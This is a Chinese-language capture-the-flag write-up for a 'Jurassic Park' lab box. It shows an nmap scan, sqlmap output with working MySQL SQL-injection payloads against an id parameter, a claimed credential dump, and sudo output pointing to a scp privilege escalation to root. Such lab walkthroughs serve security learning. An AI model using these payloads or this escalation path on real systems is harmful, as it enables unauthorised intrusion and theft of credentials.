Jurassic Park
端口扫描
root@ip-10-10-110-123:~/jurassicpark# nmap -sTCV -p 22,80 --min-rate 1000 10.10.119.109
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-29 08:11 GMT
Nmap scan report for ip-10-10-119-109.eu-west-1.compute.internal (10.10.119.109)
Host is up (0.00014s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1a:76:eb:69:62:02:e7:86:57:5a:89:d3:f2:bb:ac:75 (RSA)
| 256 4b:2d:e5:a2:7c:8c:7b:4c:fd:08:ee:20:5c:e0:e7:19 (ECDSA)
|_ 256 4a:a9:0e:19:b5:b7:95:9d:07:cb:39:c2:35:21:36:a7 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jarassic Park
MAC Address: 02:3A:9F:8D:54:B5 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.51 seconds
80
访问网站, 我发现是侏罗纪公园主题当我点击恐龙页面是发现其 url 很有意思, 感觉是 sqli 点,经过测试发现确认是 sqli
直接 sqlmap 开跑, 确认漏洞拖库从中获取到一个用户名以及两个密码
root@ip-10-10-110-123:~/jurassicpark# sqlmap -r sql.txt --risk 3 --level 3
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 6457=6457
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2 AND (SELECT 7793 FROM(SELECT COUNT(*),CONCAT(0x7171786271,(SELECT (ELT(7793=7793,1))),0x7171706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
后渗透
Dennis
使用之前得到的密码进行尝试登陆,确认账号后直接登陆
Dennis —> root
发现用户 Dennis 存在 sudo 特权我们可以利用此来获取 Shell scp#sudo
dennis@ip-10-10-119-109:/home/ubuntu$ sudo -l
Matching Defaults entries for dennis on ip-10-10-119-109.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dennis may run the following commands on ip-10-10-119-109.eu-west-1.compute.internal:
(ALL) NOPASSWD: /usr/bin/scp
